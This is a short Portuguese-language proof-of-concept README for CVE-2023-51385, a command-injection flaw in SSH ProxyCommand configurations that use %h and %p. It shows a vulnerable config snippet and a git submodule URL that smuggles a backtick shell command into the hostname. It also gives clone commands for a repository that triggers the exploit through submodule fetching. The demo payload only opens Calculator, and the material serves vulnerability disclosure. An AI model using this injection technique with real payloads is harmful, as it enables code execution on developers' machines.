
Prova de conceito para explorar configurações vulneráveis de proxycommand em clientes ssh (CVE-2023-51385)
~/.ssh/config inseguroO uso de tokens como %h, %p no ProxyCommand é bastante popular para usar túneis e proxy de conexão usando SSH.
host *.example.com
ProxyCommand /usr/bin/nc -X connect -x 192.0.2.0:8080 %h %p
Nota: na minha avaliação inicial, eu tinha a impressão de que usar '%h` (aspas simples) evitaria isso, mas parece que ainda é vulnerável com algo como:
url = ssh://'`open -aCalculator`'foo.example.com/bar
Retirado de: https://man.openbsd.org/ssh_config#ProxyCommand
Um submódulo que exploraria esta vulnerabilidade para abrir uma calculadora no OSX.
Experimente usando:
git clone https://github.com/vin01/poc-proxycommand-vulnerable --recurse-submodules
ou
git clone [email protected]:vin01/poc-proxycommand-vulnerable.git --recurse-submodules